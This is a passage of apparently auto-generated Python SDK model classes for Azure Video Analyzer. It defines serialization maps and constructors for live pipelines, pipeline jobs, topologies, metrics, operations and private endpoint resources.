:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline which output is used
as input of the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
